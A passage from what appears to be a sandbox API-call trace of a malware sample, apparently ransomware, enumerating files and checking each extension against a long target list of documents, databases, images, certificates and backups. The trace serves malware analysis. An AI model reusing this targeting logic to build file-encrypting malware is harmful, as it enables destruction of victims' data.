nFileSizeLow=0x15e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0034.709] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x3806fc0, Size=0x8000) returned 0x3f02080 [0034.709] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0034.710] lstrlenW (lpString="rtscom.dll.mui") returned 14 [0034.710] lstrlenW (lpString=".1cd") returned 4 [0034.710] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".3ds") returned 4 [0034.710] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".3fr") returned 4 [0034.710] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".3g2") returned 4 [0034.710] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".3gp") returned 4 [0034.710] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".7z") returned 3 [0034.710] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.710] lstrlenW (lpString=".accda") returned 6 [0034.710] lstrcmpiW (lpString1=".accda", lpString2="ll.mui") returned -1 [0034.710] lstrlenW (lpString=".accdb") returned 6 [0034.710] lstrcmpiW (lpString1=".accdb", lpString2="ll.mui") returned -1 [0034.710] lstrlenW (lpString=".accdc") returned 6 [0034.710] lstrcmpiW (lpString1=".accdc", lpString2="ll.mui") returned -1 [0034.710] lstrlenW (lpString=".accde") returned 6 [0034.710] lstrcmpiW (lpString1=".accde", lpString2="ll.mui") returned -1 [0034.710] lstrlenW (lpString=".accdt") returned 6 [0034.710] lstrcmpiW (lpString1=".accdt", lpString2="ll.mui") returned -1 [0034.710] lstrlenW (lpString=".accdw") returned 6 [0034.710] lstrcmpiW (lpString1=".accdw", lpString2="ll.mui") returned -1 [0034.710] lstrlenW (lpString=".adb") returned 4 [0034.710] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".adp") returned 4 [0034.710] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".ai") returned 3 [0034.710] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0034.710] lstrlenW (lpString=".ai3") returned 4 [0034.710] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".ai4") returned 4 [0034.710] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0034.710] lstrlenW (lpString=".ai5") returned 4 [0034.711] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".ai6") returned 4 [0034.711] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".ai7") returned 4 [0034.711] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".ai8") returned 4 [0034.711] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".anim") returned 5 [0034.711] lstrcmpiW (lpString1=".anim", lpString2="l.mui") returned -1 [0034.711] lstrlenW (lpString=".arw") returned 4 [0034.711] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".as") returned 3 [0034.711] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0034.711] lstrlenW (lpString=".asa") returned 4 [0034.711] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".asc") returned 4 [0034.711] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".ascx") returned 5 [0034.711] lstrcmpiW (lpString1=".ascx", lpString2="l.mui") returned -1 [0034.711] lstrlenW (lpString=".asm") returned 4 [0034.711] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".asmx") returned 5 [0034.711] lstrcmpiW (lpString1=".asmx", lpString2="l.mui") returned -1 [0034.711] lstrlenW (lpString=".asp") returned 4 [0034.711] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".aspx") returned 5 [0034.711] lstrcmpiW (lpString1=".aspx", lpString2="l.mui") returned -1 [0034.711] lstrlenW (lpString=".asr") returned 4 [0034.711] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".asx") returned 4 [0034.711] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".avi") returned 4 [0034.711] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0034.711] lstrlenW (lpString=".avs") returned 4 [0034.712] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".backup") returned 7 [0034.712] lstrcmpiW (lpString1=".backup", lpString2="dll.mui") returned -1 [0034.712] lstrlenW (lpString=".bak") returned 4 [0034.712] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".bay") returned 4 [0034.712] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".bd") returned 3 [0034.712] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0034.712] lstrlenW (lpString=".bin") returned 4 [0034.712] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".bmp") returned 4 [0034.712] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".bz2") returned 4 [0034.712] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".c") returned 2 [0034.712] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0034.712] lstrlenW (lpString=".cdr") returned 4 [0034.712] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".cer") returned 4 [0034.712] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".cf") returned 3 [0034.712] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0034.712] lstrlenW (lpString=".cfc") returned 4 [0034.712] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".cfm") returned 4 [0034.712] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".cfml") returned 5 [0034.712] lstrcmpiW (lpString1=".cfml", lpString2="l.mui") returned -1 [0034.712] lstrlenW (lpString=".cfu") returned 4 [0034.712] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".chm") returned 4 [0034.712] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".cin") returned 4 [0034.712] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0034.712] lstrlenW (lpString=".class") returned 6 [0034.713] lstrcmpiW (lpString1=".class", lpString2="ll.mui") returned -1 [0034.713] lstrlenW (lpString=".clx") returned 4 [0034.713] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".config") returned 7 [0034.713] lstrcmpiW (lpString1=".config", lpString2="dll.mui") returned -1 [0034.713] lstrlenW (lpString=".cpp") returned 4 [0034.713] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".cr2") returned 4 [0034.713] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".crt") returned 4 [0034.713] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".crw") returned 4 [0034.713] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".cs") returned 3 [0034.713] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0034.713] lstrlenW (lpString=".css") returned 4 [0034.713] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".csv") returned 4 [0034.713] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".cub") returned 4 [0034.713] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".dae") returned 4 [0034.713] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".dat") returned 4 [0034.713] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".db") returned 3 [0034.713] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0034.713] lstrlenW (lpString=".dbf") returned 4 [0034.713] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".dbx") returned 4 [0034.713] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".dc3") returned 4 [0034.713] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".dcm") returned 4 [0034.713] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0034.713] lstrlenW (lpString=".dcr") returned 4 [0034.714] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".der") returned 4 [0034.714] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dib") returned 4 [0034.714] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dic") returned 4 [0034.714] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dif") returned 4 [0034.714] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".divx") returned 5 [0034.714] lstrcmpiW (lpString1=".divx", lpString2="l.mui") returned -1 [0034.714] lstrlenW (lpString=".djvu") returned 5 [0034.714] lstrcmpiW (lpString1=".djvu", lpString2="l.mui") returned -1 [0034.714] lstrlenW (lpString=".dng") returned 4 [0034.714] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".doc") returned 4 [0034.714] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".docm") returned 5 [0034.714] lstrcmpiW (lpString1=".docm", lpString2="l.mui") returned -1 [0034.714] lstrlenW (lpString=".docx") returned 5 [0034.714] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0034.714] lstrlenW (lpString=".dot") returned 4 [0034.714] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dotm") returned 5 [0034.714] lstrcmpiW (lpString1=".dotm", lpString2="l.mui") returned -1 [0034.714] lstrlenW (lpString=".dotx") returned 5 [0034.714] lstrcmpiW (lpString1=".dotx", lpString2="l.mui") returned -1 [0034.714] lstrlenW (lpString=".dpx") returned 4 [0034.714] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dqy") returned 4 [0034.714] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dsn") returned 4 [0034.714] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0034.714] lstrlenW (lpString=".dt") returned 3 [0034.714] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0034.714] lstrlenW (lpString=".dtd") returned 4 [0034.715] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".dwg") returned 4 [0034.715] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".dwt") returned 4 [0034.715] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".dx") returned 3 [0034.715] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0034.715] lstrlenW (lpString=".dxf") returned 4 [0034.715] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".edml") returned 5 [0034.715] lstrcmpiW (lpString1=".edml", lpString2="l.mui") returned -1 [0034.715] lstrlenW (lpString=".efd") returned 4 [0034.715] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".elf") returned 4 [0034.715] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".emf") returned 4 [0034.715] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".emz") returned 4 [0034.715] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".epf") returned 4 [0034.715] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".eps") returned 4 [0034.715] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".epsf") returned 5 [0034.715] lstrcmpiW (lpString1=".epsf", lpString2="l.mui") returned -1 [0034.715] lstrlenW (lpString=".epsp") returned 5 [0034.715] lstrcmpiW (lpString1=".epsp", lpString2="l.mui") returned -1 [0034.715] lstrlenW (lpString=".erf") returned 4 [0034.715] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".exr") returned 4 [0034.715] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".f4v") returned 4 [0034.715] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0034.715] lstrlenW (lpString=".fido") returned 5 [0034.716] lstrcmpiW (lpString1=".fido", lpString2="l.mui") returned -1 [0034.716] lstrlenW (lpString=".flm") returned 4 [0034.716] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".flv") returned 4 [0034.716] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".frm") returned 4 [0034.716] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".fxg") returned 4 [0034.716] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".geo") returned 4 [0034.716] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".gif") returned 4 [0034.716] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".grs") returned 4 [0034.716] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".gz") returned 3 [0034.716] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0034.716] lstrlenW (lpString=".h") returned 2 [0034.716] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0034.716] lstrlenW (lpString=".hdr") returned 4 [0034.716] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".hpp") returned 4 [0034.716] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".hta") returned 4 [0034.716] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".htc") returned 4 [0034.716] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".htm") returned 4 [0034.716] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".html") returned 5 [0034.716] lstrcmpiW (lpString1=".html", lpString2="l.mui") returned -1 [0034.716] lstrlenW (lpString=".icb") returned 4 [0034.716] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".ics") returned 4 [0034.716] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0034.716] lstrlenW (lpString=".iff") returned 4 [0034.717] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".inc") returned 4 [0034.717] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".indd") returned 5 [0034.717] lstrcmpiW (lpString1=".indd", lpString2="l.mui") returned -1 [0034.717] lstrlenW (lpString=".ini") returned 4 [0034.717] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".iqy") returned 4 [0034.717] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".j2c") returned 4 [0034.717] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".j2k") returned 4 [0034.717] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".java") returned 5 [0034.717] lstrcmpiW (lpString1=".java", lpString2="l.mui") returned -1 [0034.717] lstrlenW (lpString=".jp2") returned 4 [0034.717] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".jpc") returned 4 [0034.717] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".jpe") returned 4 [0034.717] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".jpeg") returned 5 [0034.717] lstrcmpiW (lpString1=".jpeg", lpString2="l.mui") returned -1 [0034.717] lstrlenW (lpString=".jpf") returned 4 [0034.717] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".jpg") returned 4 [0034.717] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".jpx") returned 4 [0034.717] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".js") returned 3 [0034.717] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0034.717] lstrlenW (lpString=".jsf") returned 4 [0034.717] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0034.717] lstrlenW (lpString=".json") returned 5 [0034.717] lstrcmpiW (lpString1=".json", lpString2="l.mui") returned -1 [0034.717] lstrlenW (lpString=".jsp") returned 4 [0034.718] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".kdc") returned 4 [0034.718] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".kmz") returned 4 [0034.718] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".kwm") returned 4 [0034.718] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".lasso") returned 6 [0034.718] lstrcmpiW (lpString1=".lasso", lpString2="ll.mui") returned -1 [0034.718] lstrlenW (lpString=".lbi") returned 4 [0034.718] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".lgf") returned 4 [0034.718] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".lgp") returned 4 [0034.718] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".log") returned 4 [0034.718] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".m1v") returned 4 [0034.718] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".m4a") returned 4 [0034.718] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".m4v") returned 4 [0034.718] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".max") returned 4 [0034.718] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".md") returned 3 [0034.718] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0034.718] lstrlenW (lpString=".mda") returned 4 [0034.718] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".mdb") returned 4 [0034.718] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".mde") returned 4 [0034.718] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".mdf") returned 4 [0034.718] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0034.718] lstrlenW (lpString=".mdw") returned 4 [0034.719] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mef") returned 4 [0034.719] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mft") returned 4 [0034.719] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mfw") returned 4 [0034.719] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mht") returned 4 [0034.719] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mhtml") returned 6 [0034.719] lstrcmpiW (lpString1=".mhtml", lpString2="ll.mui") returned -1 [0034.719] lstrlenW (lpString=".mka") returned 4 [0034.719] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mkidx") returned 6 [0034.719] lstrcmpiW (lpString1=".mkidx", lpString2="ll.mui") returned -1 [0034.719] lstrlenW (lpString=".mkv") returned 4 [0034.719] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mos") returned 4 [0034.719] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mov") returned 4 [0034.719] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mp3") returned 4 [0034.719] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mp4") returned 4 [0034.719] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mpeg") returned 5 [0034.719] lstrcmpiW (lpString1=".mpeg", lpString2="l.mui") returned -1 [0034.719] lstrlenW (lpString=".mpg") returned 4 [0034.719] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mpv") returned 4 [0034.719] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".mrw") returned 4 [0034.719] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0034.719] lstrlenW (lpString=".msg") returned 4 [0034.720] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0034.720] lstrlenW (lpString=".mxl") returned 4 [0034.720] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".myd") returned 4 [0034.720] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".myi") returned 4 [0034.720] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".nef") returned 4 [0034.720] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".nrw") returned 4 [0034.720] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".obj") returned 4 [0034.720] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".odb") returned 4 [0034.720] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".odc") returned 4 [0034.720] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".odm") returned 4 [0034.720] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".odp") returned 4 [0034.720] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".ods") returned 4 [0034.720] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".oft") returned 4 [0034.720] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".one") returned 4 [0034.720] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".onepkg") returned 7 [0034.720] lstrcmpiW (lpString1=".onepkg", lpString2="dll.mui") returned -1 [0034.720] lstrlenW (lpString=".onetoc2") returned 8 [0034.720] lstrcmpiW (lpString1=".onetoc2", lpString2=".dll.mui") returned 1 [0034.720] lstrlenW (lpString=".opt") returned 4 [0034.720] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".oqy") returned 4 [0034.720] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0034.720] lstrlenW (lpString=".orf") returned 4 [0034.721] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".p12") returned 4 [0034.721] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".p7b") returned 4 [0034.721] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".p7c") returned 4 [0034.721] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pam") returned 4 [0034.721] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pbm") returned 4 [0034.721] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pct") returned 4 [0034.721] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pcx") returned 4 [0034.721] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pdd") returned 4 [0034.721] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pdf") returned 4 [0034.721] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pdp") returned 4 [0034.721] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pef") returned 4 [0034.721] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pem") returned 4 [0034.721] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pff") returned 4 [0034.721] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pfm") returned 4 [0034.721] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pfx") returned 4 [0034.721] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".pgm") returned 4 [0034.721] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".php") returned 4 [0034.721] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0034.721] lstrlenW (lpString=".php3") returned 5 [0034.722] lstrcmpiW (lpString1=".php3", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".php4") returned 5 [0034.722] lstrcmpiW (lpString1=".php4", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".php5") returned 5 [0034.722] lstrcmpiW (lpString1=".php5", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".phtml") returned 6 [0034.722] lstrcmpiW (lpString1=".phtml", lpString2="ll.mui") returned -1 [0034.722] lstrlenW (lpString=".pict") returned 5 [0034.722] lstrcmpiW (lpString1=".pict", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".pl") returned 3 [0034.722] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0034.722] lstrlenW (lpString=".pls") returned 4 [0034.722] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0034.722] lstrlenW (lpString=".pm") returned 3 [0034.722] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0034.722] lstrlenW (lpString=".png") returned 4 [0034.722] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0034.722] lstrlenW (lpString=".pnm") returned 4 [0034.722] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0034.722] lstrlenW (lpString=".pot") returned 4 [0034.722] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0034.722] lstrlenW 